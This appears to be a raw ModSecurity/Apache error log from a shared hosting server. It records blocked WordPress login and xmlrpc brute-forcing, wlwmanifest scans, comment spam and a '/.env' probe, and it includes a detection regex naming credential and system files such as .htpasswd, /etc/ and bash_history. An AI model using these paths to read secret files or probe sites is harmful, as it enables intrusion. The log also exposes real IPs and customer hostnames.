[Tue May 26 13:38:59.745479 2026] [security2:error] [pid 544395:tid 544597] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVGxmrs7g3RMCdp8XGggAAAEg"]
[Tue May 26 13:39:01.463592 2026] [security2:error] [pid 544395:tid 544555] [client 106.192.248.115:61194] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVHRmrs7g3RMCdp8XGpgAAAB4"]
[Tue May 26 13:39:01.463756 2026] [security2:error] [pid 544395:tid 544555] [client 106.192.248.115:61194] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVHRmrs7g3RMCdp8XGpgAAAB4"]
[Tue May 26 13:39:01.796988 2026] [security2:error] [pid 536875:tid 537108] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVHer_-FTveSGlx1Hl_gAAAOw"]
[Tue May 26 13:39:02.270582 2026] [security2:error] [pid 544395:tid 544601] [client 129.222.147.134:53818] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVHhmrs7g3RMCdp8XGswAAAEw"]
[Tue May 26 13:39:02.273964 2026] [security2:error] [pid 544395:tid 544601] [client 129.222.147.134:53818] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVHhmrs7g3RMCdp8XGswAAAEw"]
[Tue May 26 13:39:04.109218 2026] [security2:error] [pid 544395:tid 544645] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVHxmrs7g3RMCdp8XGwwAAAHg"]
[Tue May 26 13:39:05.261192 2026] [security2:error] [pid 544395:tid 544615] [client 104.28.155.33:39333] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.155.28.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.hotsalesretail.com"] [uri "/wp-login.php"] [unique_id "ahVVIRmrs7g3RMCdp8XG2wAAAFo"]
[Tue May 26 13:39:05.645635 2026] [autoindex:error] [pid 536875:tid 537036] [client 104.198.164.242:52151] AH01276: Cannot serve directory /home2/tips4iow/traderscafe.club/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 13:39:05.829232 2026] [security2:error] [pid 544395:tid 544632] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVIRmrs7g3RMCdp8XG4AAAAGs"]
[Tue May 26 13:39:06.403375 2026] [security2:error] [pid 536875:tid 537082] [client 104.198.164.242:52151] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 242.164.198.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "traderscafe.club.jiyani.in"] [uri "/xmlrpc.php"] [unique_id "ahVVIur_-FTveSGlx1HmUAAAANI"]
[Tue May 26 13:39:06.824122 2026] [security2:error] [pid 544395:tid 544603] [client 104.198.164.242:55694] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/blog/wp-includes/wlwmanifest.xml"] [unique_id "ahVVIhmrs7g3RMCdp8XG-wAAAE4"]
[Tue May 26 13:39:07.265901 2026] [security2:error] [pid 544395:tid 544645] [client 104.198.164.242:55826] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahVVIxmrs7g3RMCdp8XHBgAAAHg"]
[Tue May 26 13:39:07.325183 2026] [security2:error] [pid 544395:tid 544633] [client 57.141.2.37:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVIhmrs7g3RMCdp8XG_wAAAGw"]
[Tue May 26 13:39:07.633857 2026] [security2:error] [pid 536875:tid 537120] [client 104.198.164.242:49750] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/wp/wp-includes/wlwmanifest.xml"] [unique_id "ahVVI-r_-FTveSGlx1HmYAAAAPg"]
[Tue May 26 13:39:08.037178 2026] [security2:error] [pid 544395:tid 544575] [client 104.198.164.242:65131] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/2020/wp-includes/wlwmanifest.xml"] [unique_id "ahVVJBmrs7g3RMCdp8XHFwAAADI"]
[Tue May 26 13:39:08.447471 2026] [security2:error] [pid 544395:tid 544629] [client 104.198.164.242:54822] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/2021/wp-includes/wlwmanifest.xml"] [unique_id "ahVVJBmrs7g3RMCdp8XHHgAAAGg"]
[Tue May 26 13:39:09.041345 2026] [security2:error] [pid 536875:tid 537010] [client 104.198.164.242:64387] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/shop/wp-includes/wlwmanifest.xml"] [unique_id "ahVVJer_-FTveSGlx1HmbwAAAIo"]
[Tue May 26 13:39:09.430465 2026] [security2:error] [pid 544395:tid 544581] [client 104.198.164.242:54856] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/test/wp-includes/wlwmanifest.xml"] [unique_id "ahVVJRmrs7g3RMCdp8XHKwAAADg"]
[Tue May 26 13:39:09.431249 2026] [security2:error] [pid 544395:tid 544646] [client 57.141.2.13:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVJBmrs7g3RMCdp8XHKQAAAHk"]
[Tue May 26 13:39:09.761151 2026] [security2:error] [pid 536875:tid 537041] [client 104.198.164.242:54856] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahVVJer_-FTveSGlx1HmewAAAKk"]
[Tue May 26 13:39:10.038749 2026] [security2:error] [pid 544395:tid 544580] [client 104.28.155.33:39336] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 33.155.28.104.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.hotsalesretail.com"] [uri "/wp-login.php"] [unique_id "ahVVJhmrs7g3RMCdp8XHOAAAADc"]
[Tue May 26 13:39:10.169210 2026] [security2:error] [pid 544395:tid 544540] [client 104.198.164.242:54862] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "traderscafe.club.jiyani.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahVVJhmrs7g3RMCdp8XHPAAAAA8"]
[Tue May 26 13:39:10.237143 2026] [security2:error] [pid 536875:tid 536878] [remote 185.192.20.41:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "185.192.20.41" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVJur_-FTveSGlx1HmggAA1wI"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:10.237300 2026] [security2:error] [pid 536875:tid 537087] [client 185.192.20.41:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVJur_-FTveSGlx1HmggAA1wI"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:10.535088 2026] [security2:error] [pid 544395:tid 544465] [remote 45.137.215.217:0] ModSecurity: Access denied with code 406 (phase 1). IPmatchFromFile: "45.137.215.217" matched at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1090"] [id "999022"] [msg "Blacklisted IP Address for POST data StopForumSpam List"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVJhmrs7g3RMCdp8XHRAAAJkU"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:10.535289 2026] [security2:error] [pid 544395:tid 544563] [client 45.137.215.217:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/premium-family-club-in-bangalore/wp-comments-post.php"] [unique_id "ahVVJhmrs7g3RMCdp8XHRAAAJkU"], referer: https://kingsclub.in/premium-family-club-in-bangalore/2025/07/04/hello-world/
[Tue May 26 13:39:10.734888 2026] [security2:error] [pid 544395:tid 544455] [remote 52.18.195.140:40630] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 140.195.18.52.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "jhonweb.com"] [uri "/wp-login.php"] [unique_id "ahVVJhmrs7g3RMCdp8XHRgAAajs"]
[Tue May 26 13:39:11.422705 2026] [security2:error] [pid 544395:tid 544528] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVJxmrs7g3RMCdp8XHTwAAAAM"]
[Tue May 26 13:39:11.778852 2026] [security2:error] [pid 536875:tid 537009] [client 106.192.248.115:61503] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVJ-r_-FTveSGlx1HmlgAAAIk"]
[Tue May 26 13:39:11.779018 2026] [security2:error] [pid 536875:tid 537009] [client 106.192.248.115:61503] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVJ-r_-FTveSGlx1HmlgAAAIk"]
[Tue May 26 13:39:12.154311 2026] [security2:error] [pid 544395:tid 544616] [client 45.148.10.174:56388] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVKBmrs7g3RMCdp8XHXgAAAFs"]
[Tue May 26 13:39:12.523412 2026] [security2:error] [pid 536875:tid 537056] [client 129.222.147.134:32350] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVKOr_-FTveSGlx1HmoAAAALg"]
[Tue May 26 13:39:12.527112 2026] [security2:error] [pid 536875:tid 537056] [client 129.222.147.134:32350] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVKOr_-FTveSGlx1HmoAAAALg"]
[Tue May 26 13:39:12.751428 2026] [security2:error] [pid 544395:tid 544560] [client 45.148.10.174:56404] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "koneksi.com.co"] [uri "/.env"] [unique_id "ahVVKBmrs7g3RMCdp8XHawAAACM"]
[Tue May 26 13:39:13.490538 2026] [security2:error] [pid 536875:tid 537042] [client 45.148.10.174:56470] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVKer_-FTveSGlx1HmtQAAAKo"]
[Tue May 26 13:39:13.865234 2026] [security2:error] [pid 536875:tid 537107] [client 57.141.2.6:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVKer_-FTveSGlx1HmugAAAOs"]
[Tue May 26 13:39:14.384169 2026] [security2:error] [pid 536875:tid 537025] [client 45.148.10.174:51460] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVKur_-FTveSGlx1HmxgAAAJk"]
[Tue May 26 13:39:15.259616 2026] [security2:error] [pid 536875:tid 536883] [remote 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVK-r_-FTveSGlx1Hm1QAA1gc"]
[Tue May 26 13:39:15.259793 2026] [security2:error] [pid 536875:tid 537086] [client 2001:e68:5454:d381:6990:20f1:f8fe:2d59:0] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "kingsclub.in"] [uri "/xmlrpc.php"] [unique_id "ahVVK-r_-FTveSGlx1Hm1QAA1gc"]
[Tue May 26 13:39:15.277401 2026] [security2:error] [pid 536875:tid 537114] [client 45.148.10.174:51476] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVK-r_-FTveSGlx1Hm0wAAAPI"]
[Tue May 26 13:39:15.759734 2026] [security2:error] [pid 544395:tid 544582] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVKxmrs7g3RMCdp8XHiQAAADk"]
[Tue May 26 13:39:16.138134 2026] [security2:error] [pid 544395:tid 544547] [client 45.148.10.174:51486] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVLBmrs7g3RMCdp8XHmAAAABY"]
[Tue May 26 13:39:16.564130 2026] [security2:error] [pid 544395:tid 544477] [remote 5.45.96.74:50044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 74.96.45.5.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVVLBmrs7g3RMCdp8XHnwAAMFE"]
[Tue May 26 13:39:17.119460 2026] [security2:error] [pid 536875:tid 537042] [client 122.172.83.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/index.php"] [unique_id "ahVVLer_-FTveSGlx1Hm7gAAAKo"], referer: https://www.xllent.in/contact-us/
[Tue May 26 13:39:17.120101 2026] [security2:error] [pid 544395:tid 544540] [client 122.172.83.27:18084] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.xllent.in"] [uri "/captcha.php/"] [unique_id "ahVVLBmrs7g3RMCdp8XHrgAAD1Q"], referer: https://www.xllent.in/contact-us/
[Tue May 26 13:39:17.229202 2026] [security2:error] [pid 536875:tid 537066] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVLOr_-FTveSGlx1Hm6wAAAMI"]
[Tue May 26 13:39:17.384854 2026] [security2:error] [pid 544395:tid 544598] [client 146.174.176.78:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVLBmrs7g3RMCdp8XHrwAAAEk"]
[Tue May 26 13:39:19.632181 2026] [security2:error] [pid 536875:tid 537117] [client 45.148.10.174:51488] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVL-r_-FTveSGlx1HnBgAAAPU"]
[Tue May 26 13:39:19.849164 2026] [security2:error] [pid 544395:tid 544586] [client 45.148.10.174:51496] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVLxmrs7g3RMCdp8XH4AAAAD0"]
[Tue May 26 13:39:20.007832 2026] [security2:error] [pid 544395:tid 544628] [client 45.148.10.174:51500] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVLxmrs7g3RMCdp8XH5AAAAGc"]
[Tue May 26 13:39:20.252749 2026] [security2:error] [pid 544395:tid 544605] [client 45.148.10.174:51504] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVMBmrs7g3RMCdp8XH5wAAAFA"]
[Tue May 26 13:39:20.391068 2026] [security2:error] [pid 544395:tid 544643] [client 45.148.10.174:51510] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "koneksi.com.co"] [uri "/index.php"] [unique_id "ahVVMBmrs7g3RMCdp8XH6wAAAHY"]
[Tue May 26 13:39:20.648772 2026] [security2:error] [pid 536875:tid 537098] [client 114.119.151.179:62271] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rohiniventures.com"] [uri "/blog/category/tamtam/"] [unique_id "ahVVMOr_-FTveSGlx1HnEwAAAOI"], referer: http://rohiniventures.com/blog/category/parent-category
[Tue May 26 13:39:20.774735 2026] [security2:error] [pid 536875:tid 537023] [client 45.185.226.168:50836] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "jailanitradingcompany.com"] [uri "/"] [unique_id "ahVVMOr_-FTveSGlx1HnFAAAAJc"]
[Tue May 26 13:39:20.871777 2026] [security2:error] [pid 536875:tid 537046] [client 45.185.226.168:50850] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "bhavisharchitects.com"] [uri "/"] [unique_id "ahVVMOr_-FTveSGlx1HnFQAAAK4"]
[Tue May 26 13:39:20.873772 2026] [security2:error] [pid 536875:tid 537114] [client 45.185.226.168:50848] ModSecurity: Access denied with code 406 (phase 1). Match of "ipMatch 127.0.0.1" against "REMOTE_ADDR" required. [file "/opt/mod_security/hg_rules.conf"] [line "1461"] [id "909116"] [msg "Golang default UA"] [hostname "www.jailanitradingcompany.svijaykumar.in"] [uri "/"] [unique_id "ahVVMOr_-FTveSGlx1HnFgAAAPI"]
[Tue May 26 13:39:21.325342 2026] [security2:error] [pid 544395:tid 544645] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVVMBmrs7g3RMCdp8XH9gAAAHg"]
[Tue May 26 13:39:21.623850 2026] [security2:error] [pid 536875:tid 537029] [client 106.192.248.115:61806] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 115.248.192.106.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVMer_-FTveSGlx1HnJQAAAJ0"]
[Tue May 26 13:39:21.624029 2026] [security2:error] [pid 536875:tid 537029] [client 106.192.248.115:61806] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVVMer_-FTveSGlx1HnJQAAAJ0"]
[Tue May 26 13:39:22.858589 2026] [security2:error] [pid 544395:tid 544569] [client 129.222.147.134:29341] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 134.147.222.129.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVMhmrs7g3RMCdp8XIEgAAACw"]
[Tue May 26 13:39:22.858735 2026] [security2:error] [pid 544395:tid 544569] [client 129.222.147.134:29341] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "ivwellnessresources.org"] [uri "/xmlrpc.php"] [unique_id "ahVVMhmrs7g3RMCdp8XIEgAAACw"]
[Tue May 26 13:39:23.295302 2026] [core:crit] [pid 544395:tid 544599] (13)Permission denied: [client 40.77.167.132:0] AH00529: /home1/taote1zo/public_html/nigeriahomebuilders.com/.htaccess pcfg_openfile: unable to check htaccess file, ensure it is readable and that '/home1/taote1zo/public_html/nigeriahomebuilders.com/' is executable
[Tue May 26 13:39:23.685265 2026] [security2:error] [pid 536875:tid 536903] [remote 37.187.156.42:45032] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 42.156.187.37.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "yourstorybag.com"] [uri "/wp-login.php"] [unique_id "ahVVM-r_-FTveSGlx1HnPQAApBs"]
